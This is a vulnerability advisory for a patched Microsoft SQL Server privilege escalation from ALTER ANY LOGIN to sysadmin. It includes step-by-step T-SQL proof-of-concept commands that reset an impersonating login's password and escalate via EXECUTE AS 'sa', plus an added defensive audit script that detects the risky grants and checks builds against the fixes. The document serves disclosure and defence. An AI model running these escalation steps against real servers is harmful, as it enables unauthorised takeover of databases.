Title: MSSQL Database Privilege Elevation From ALTER ANY LOGIN To SYSADMIN
Product: Microsoft SQL Server
Vendor: Microsoft
Affected Version(s): SQL Server 2016, 2017, 2019, 2022
Tested Version(s): SQL Server 2016, 2017, 2019, 2022
Fixed Build Versions: 16.0.4210.1, 16.0.1145.1, 15.0.4440.1, 15.0.2140.1, 14.0.3500.1, 14.0.2080.1, 13.0.7060.1, 13.0.6465.1
Risk Level: Medium
Solution Status: Fixed
CVE Reference: N/A
Author of Advisory: Emad Al-Mousa
*****************************************
Vulnerability Details:
Privilege escalation in Microsoft SQL Server is possible if a database login is granted the server permission "ALTER ANY LOGIN" and any existing SQL Server login has been granted the "IMPERSONATE ANY LOGIN" permission directly: the account holding "ALTER ANY LOGIN" is able to reset/change the password of that login. Consequently, the attacker can connect using the account with "IMPERSONATE ANY LOGIN" and elevate his/her primary account to the SYSADMIN role.
By design, a SQL Server login with the "ALTER ANY LOGIN" permission cannot change the password of the built-in "sa" account, nor the passwords of logins granted "control server", "sysadmin" or "securityadmin", as a protection mechanism against privilege elevation attacks.
*****************************************
Proof of Concept (PoC):
I will create a dummy account called "kit" and grant it the ALTER ANY LOGIN permission:
USE [master]
GO
CREATE LOGIN [kit] WITH PASSWORD=N'kit123', DEFAULT_DATABASE=[master], DEFAULT_LANGUAGE=[us_english], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF
GO
use [master]
GO
GRANT ALTER ANY LOGIN TO [kit]
GO
I will then access the SQL Server instance using the account "kit" and search for any login in the instance that is granted the "impersonate any login" permission, with the aim of escalating my permissions.
I will create two accounts that have "impersonate any login" permissions:
USE [master]
GO
CREATE LOGIN [test1] WITH PASSWORD=N'test1', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF
GO
grant impersonate any login to [test1]
GO
-- CONTROL SERVER implicitly includes the IMPERSONATE ANY LOGIN permission
USE [master]
GO
CREATE LOGIN [test2] WITH PASSWORD=N'test2', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF
GO
grant control server to [test2]
GO
As the "kit" login I try to alter/change the password for the two logins test1 and test2:
USE [master]
GO
ALTER LOGIN [test1] WITH PASSWORD=N'emad@2025'
GO
USE [master]
GO
ALTER LOGIN [test2] WITH PASSWORD=N'emad@2025'
GO
So, I was able to change the password only for the login that is explicitly granted the "impersonate any login" permission (the test1 account); I cannot do that for logins granted "control server", "sysadmin" or "securityadmin", or for the "sa" account, as expected and by design.
After successfully resetting the password for the test1 account, you can connect to the SQL Server instance as test1 and escalate the "kit" account to sysadmin as shown below:
execute as login='sa'
alter server role [sysadmin] add member [kit]
GO
Now, let me apply the latest Microsoft security update, released in August 2025 (KB5063756), and repeat the test:
USE [master]
GO
ALTER LOGIN [test1] WITH PASSWORD=N'hot_summer@2025'
GO
It is now blocked with the error:
Msg 15151, Level 16, State 1, Line 3
Cannot alter the login 'test1', because it does not exist or you do not have permission.
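The following audit script is an added example and is not part of the original advisory. It lists, on your own instance, the two grants that combine into the path described above (logins holding ALTER ANY LOGIN, and logins granted IMPERSONATE ANY LOGIN directly that fall outside the protected set of sa, CONTROL SERVER, sysadmin and securityadmin), and then compares the instance build with the fixed builds from the advisory header. The split of each major version into two servicing branches by build-number range is an assumption of this example, not something the advisory states. Run it as a sysadmin so that sys.server_permissions returns every principal rather than only the caller's own rows.

```sql
-- Added audit example (not from the advisory). Run as sysadmin.
USE [master];
GO

-- 1. Logins holding ALTER ANY LOGIN directly (the attacker-side prerequisite).
SELECT p.name        AS grantee,
       p.type_desc   AS principal_type,
       p.is_disabled,
       sp.state_desc AS grant_state
FROM sys.server_permissions AS sp
JOIN sys.server_principals  AS p
  ON p.principal_id = sp.grantee_principal_id
WHERE sp.class = 100                        -- server-scoped permission
  AND sp.permission_name = N'ALTER ANY LOGIN'
  AND sp.state IN ('G', 'W')                -- GRANT / GRANT WITH GRANT OPTION
ORDER BY p.name;
GO

-- 2. Logins granted IMPERSONATE ANY LOGIN directly that are NOT covered by the
--    protection the advisory describes (sa, CONTROL SERVER grantees, sysadmin and
--    securityadmin members). On an unpatched build each of these rows is a login
--    whose password an ALTER ANY LOGIN holder could reset, so every row should be
--    removed or justified.
SELECT p.name AS impersonate_any_login_grantee,
       p.type_desc,
       p.is_disabled
FROM sys.server_permissions AS sp
JOIN sys.server_principals  AS p
  ON p.principal_id = sp.grantee_principal_id
WHERE sp.class = 100
  AND sp.permission_name = N'IMPERSONATE ANY LOGIN'
  AND sp.state IN ('G', 'W')
  AND p.principal_id <> 1                   -- sa, even if it has been renamed
  AND NOT EXISTS (                          -- explicit CONTROL SERVER grant
        SELECT 1
        FROM sys.server_permissions AS cs
        WHERE cs.grantee_principal_id = p.principal_id
          AND cs.class = 100
          AND cs.permission_name = N'CONTROL SERVER'
          AND cs.state IN ('G', 'W'))
  AND NOT EXISTS (                          -- sysadmin / securityadmin membership
        SELECT 1
        FROM sys.server_role_members AS rm
        JOIN sys.server_principals  AS r
          ON r.principal_id = rm.role_principal_id
        WHERE rm.member_principal_id = p.principal_id
          AND r.name IN (N'sysadmin', N'securityadmin'))
ORDER BY p.name;
GO

-- 3. Build check against the fixed builds listed in the advisory header.
--    Assumption (not stated in the advisory): each major version has two servicing
--    branches, and the lower-numbered branch ends at branch_end below. Adjust the
--    ranges if your environment is on a different servicing branch.
DECLARE @version nvarchar(128) = CAST(SERVERPROPERTY('ProductVersion') AS nvarchar(128));
DECLARE @major   int = CAST(PARSENAME(@version, 4) AS int);
DECLARE @build   int = CAST(PARSENAME(@version, 2) AS int);

DECLARE @fixed TABLE (major int, branch_start int, branch_end int, fixed_build int);
INSERT INTO @fixed (major, branch_start, branch_end, fixed_build) VALUES
    (16, 0, 3999, 1145), (16, 4000, 99999, 4210),   -- SQL Server 2022
    (15, 0, 3999, 2140), (15, 4000, 99999, 4440),   -- SQL Server 2019
    (14, 0, 2999, 2080), (14, 3000, 99999, 3500),   -- SQL Server 2017
    (13, 0, 6999, 6465), (13, 7000, 99999, 7060);   -- SQL Server 2016

SELECT @version AS product_version,
       f.fixed_build,
       CASE WHEN @build >= f.fixed_build
            THEN 'fixed build or later'
            ELSE 'below fixed build: apply the August 2025 security update'
       END AS status
FROM @fixed AS f
WHERE f.major = @major
  AND @build BETWEEN f.branch_start AND f.branch_end;
-- No row returned means the major version is not one the advisory lists.
GO
```

Query 2 is the one worth scheduling: a direct IMPERSONATE ANY LOGIN grant outside the protected set is exactly the condition the PoC relies on, and it is also the grant that is rarely needed in practice, since the same capability normally arrives through CONTROL SERVER or sysadmin membership, both of which the password-reset protection already covers.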
*****************************************
References:
https://databasesecurityninja.wordpress.com/2025/08/13/sql-server-privilege-elevation-escalation-from-alter-any-login-permission-to-sysadmin-role-fixed-in-august-2025-security-update/
https://support.microsoft.com/en-us/topic/kb5063756-description-of-the-security-update-for-sql-server-2022-gdr-august-12-2025-f56e3677-84b7-4ba3-ab13-b33fcfabb212